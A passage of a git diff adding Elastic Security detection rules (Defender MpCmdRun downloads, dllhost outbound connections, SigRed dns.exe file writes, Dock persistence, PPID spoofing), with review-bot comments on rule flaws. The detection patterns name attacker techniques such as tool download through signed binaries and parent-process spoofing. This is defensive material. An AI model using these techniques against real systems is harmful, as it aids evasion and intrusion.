Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Check the reputation of the domain or IP address used to host the downloaded file.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process Network 
Events\",\"providers\":[[{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"}]]}}\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"MpCmdRun.exe\" or ?process.pe.original_file_name == \"MpCmdRun.exe\") and\n process.args : \"-DownloadFile\" and process.args : \"-url\" and process.args : \"-path\"\n", + "references": [ + "https://twitter.com/mohammadaskar2/status/1301263551638761477", + "https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-can-ironically-be-used-to-download-malware/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c6453e73-90eb-4fe7-a98c-cde7bbfc504a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - 
https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "c6453e73-90eb-4fe7-a98c-cde7bbfc504a_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_106.json b/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_106.json new file mode 100644 index 00000000000..a78c6dcdae9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c7894234-7814-44c2-92a9-f7d851ea246a_106.json 
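Review bot: The investigation guide in `note` closes its "Investigate potentially compromised accounts" step with "...login events (for example, 4624) to the target host after the registry modification", but nothing in this rule touches the registry — `query` fires on an MpCmdRun.exe process start carrying `-DownloadFile`, `-url` and `-path` — so the sentence reads as carried over from another guide and will confuse analysts pivoting on it. Suggest `Analysts can do this by searching for login events (for example, 4624) to the target host after the download.`. The same wording appears in the preceding `_111` file, whose hunk begins above this view.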
@@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies unusual instances of dllhost.exe making outbound network connections. This may indicate adversarial Command and Control activity.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Network Connection via DllHost", + "query": "sequence by host.id, process.entity_id with maxspan=1m\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"dllhost.exe\" and process.args_count == 1]\n [network where host.os.type == \"windows\" and process.name : \"dllhost.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\",\n \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\",\n \"192.175.48.0/24\", \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\",\n \"FF00::/8\")]\n", + "references": [ + "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", + "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/", + "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": 
true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c7894234-7814-44c2-92a9-f7d851ea246a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "c7894234-7814-44c2-92a9-f7d851ea246a_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_109.json b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_109.json new file mode 100644 index 00000000000..fb51ead7675 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_109.json 
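Review bot: The `cidrmatch` exclusion in `query` lists the IPv4 special-purpose registry ranges plus IPv6 loopback (`::1`), link-local (`FE80::/10`) and multicast (`FF00::/8`), but not IPv6 unique-local addresses, so on dual-stack networks internal ULA traffic from dllhost.exe would be alerted on as an "unusual" external connection; adding `"FC00::/7"` to the list would keep it consistent with the RFC 1918 exclusions on the IPv4 side. Separately, this rule carries no `timestamp_override` or `setup` entry, unlike the sibling EQL rules in this commit (e.g. the `c6453e73` and `c7ce36c0` files), so with `"from": "now-9m"` events that are ingested late may fall outside the lookback window — inferred from the visible fields only, worth confirming against the package's conventions.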
@@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an unexpected file being modified by dns.exe, the process responsible for Windows DNS Server services, which may indicate activity related to remote code execution or other forms of exploitation.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual File Modification by dns.exe", + "note": "## Triage and analysis\n\n### Investigating Unusual File Write\nDetection alerts from this rule indicate potential unusual/abnormal file writes from the DNS Server service process (`dns.exe`) after exploitation from CVE-2020-1350 (SigRed) has occurred. Here are some possible avenues of investigation:\n- Post-exploitation, adversaries may write additional files or payloads to the system as additional discovery/exploitation/persistence mechanisms.\n- Any suspicious or abnormal files written from `dns.exe` should be reviewed and investigated with care.\n", + "query": "file where host.os.type == \"windows\" and process.name : \"dns.exe\" and event.type in (\"creation\", \"deletion\", \"change\") and\n not file.name : \"dns.log\" and not\n (file.extension : (\"old\", \"temp\", \"bak\", \"dns\", \"arpa\") and file.path : \"C:\\\\Windows\\\\System32\\\\dns\\\\*\")\n", + "references": [ + "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", + "https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/", + "https://www.elastic.co/security-labs/detection-rules-for-sigred-vulnerability" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + 
"name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_109", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_110.json b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_110.json new file mode 100644 index 00000000000..8178372a602 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_110.json 
@@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an unexpected file being modified by dns.exe, the process responsible for Windows DNS Server services, which may indicate activity related to remote code execution or other forms of exploitation.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual File Modification by dns.exe", + "note": "## Triage and analysis\n\n### Investigating Unusual File Write\nDetection alerts from this rule indicate potential unusual/abnormal file writes from the DNS Server service process (`dns.exe`) after exploitation from CVE-2020-1350 (SigRed) has occurred. Here are some possible avenues of investigation:\n- Post-exploitation, adversaries may write additional files or payloads to the system as additional discovery/exploitation/persistence mechanisms.\n- Any suspicious or abnormal files written from `dns.exe` should be reviewed and investigated with care.\n", + "query": "file where host.os.type == \"windows\" and process.name : \"dns.exe\" and event.type in (\"creation\", \"deletion\", \"change\") and\n not file.name : \"dns.log\" and not\n (file.extension : (\"old\", \"temp\", \"bak\", \"dns\", \"arpa\") and file.path : \"C:\\\\Windows\\\\System32\\\\dns\\\\*\")\n", + "references": [ + "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", + "https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/", + "https://www.elastic.co/security-labs/detection-rules-for-sigred-vulnerability" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + 
"name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_110", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_106.json b/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_106.json new file mode 100644 index 00000000000..3c3157bcbea --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c81cefcb-82b9-4408-a533-3c3df549e62d_106.json 
@@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An adversary can establish persistence by modifying an existing macOS dock property list in order to execute a malicious application instead of the intended one when invoked.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Persistence via Docker Shortcut Modification", + "query": "event.category:file and host.os.type:macos and event.action:modification and\n file.path:/Users/*/Library/Preferences/com.apple.dock.plist and\n not process.name:(xpcproxy or cfprefsd or plutil or jamf or PlistBuddy or InstallerRemotePluginService)\n", + "references": [ + "https://github.com/specterops/presentations/raw/master/Leo%20Pitt/Hey_Im_Still_in_Here_Modern_macOS_Persistence_SO-CON2020.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c81cefcb-82b9-4408-a533-3c3df549e62d", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "c81cefcb-82b9-4408-a533-3c3df549e62d_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_105.json b/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_105.json new file mode 100644 index 00000000000..d33c84eb556 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c85eb82c-d2c8-485c-a36f-534f914b7663_105.json 
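Review bot: `name` reads "Persistence via Docker Shortcut Modification", but nothing in this rule concerns Docker: `description`, the `query` path `/Users/*/Library/Preferences/com.apple.dock.plist` and the setup text all refer to the macOS Dock, so the alert title will mislead analysts and anyone searching rules by product. Suggest `"name": "Persistence via Dock Shortcut Modification"`. Also, the `process.name` exclusion list includes `jamf`, meaning Dock changes pushed through Jamf management are silently allowed; since the rule has no `false_positives` entry, a one-line entry noting that MDM-driven Dock edits are exempted via this list would document the gap for defenders tuning it.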
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An adversary may attempt to get detailed information about the operating system and hardware. This rule identifies common locations used to discover virtual machine hardware by a non-root user. This technique has been used by the Pupy RAT and other malware.", + "false_positives": [ + "Certain tools or automated software may enumerate hardware information. These tools can be exempted via user name or process arguments to eliminate potential noise." + ], + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Virtual Machine Fingerprinting via Grep", + "query": "process where event.type == \"start\" and\n process.name in (\"grep\", \"egrep\") and user.id != \"0\" and\n process.args : (\"parallels*\", \"vmware*\", \"virtualbox*\") and process.args : \"Manufacturer*\" and\n not process.parent.executable in (\"/Applications/Docker.app/Contents/MacOS/Docker\", \"/usr/libexec/kcare/virt-what\")\n", + "references": [ + "https://objective-see.com/blog/blog_0x4F.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c85eb82c-d2c8-485c-a36f-534f914b7663", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom 
ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 105 + }, + "id": "c85eb82c-d2c8-485c-a36f-534f914b7663_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_106.json b/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_106.json new file mode 100644 index 00000000000..1b5a2af4f7d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_106.json 
@@ -0,0 +1,153 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies parent process spoofing used to thwart detection. Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Parent Process PID Spoofing", + "query": "/* This rule is compatible with Elastic Endpoint only */\n\nsequence by host.id, user.id with maxspan=3m \n\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.Ext.token.integrity_level_name != \"system\" and \n (\n process.pe.original_file_name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\", \"eqnedt32.exe\",\n \"fltldr.exe\", \"mspub.exe\", \"msaccess.exe\", \"powershell.exe\", \"pwsh.exe\",\n \"cscript.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"msbuild.exe\",\n \"mshta.exe\", \"wmic.exe\", \"cmstp.exe\", \"msxsl.exe\") or \n \n (process.executable : (\"?:\\\\Users\\\\*.exe\",\n \"?:\\\\ProgramData\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\*.exe\",\n \"?:\\\\Windows\\\\Tasks\\\\*\") and \n (process.code_signature.exists == false or process.code_signature.status : \"errorBadDigest\")) or \n \n process.executable : \"?:\\\\Windows\\\\Microsoft.NET\\\\*.exe\" \n ) and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.pid\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.Ext.real.pid > 0 and \n \n /* process.parent.Ext.real.pid is only populated if the parent process pid doesn't match */\n not (process.name : \"msedge.exe\" and process.parent.name : \"sihost.exe\") and \n \n not 
process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.parent.Ext.real.pid\n", + "references": [ + "https://blog.didierstevens.com/2017/03/20/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.code_signature.exists", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.parent.Ext.real.pid", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c88d4bd0-5649-4c52-87ea-9be59dbfbcf2", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": 
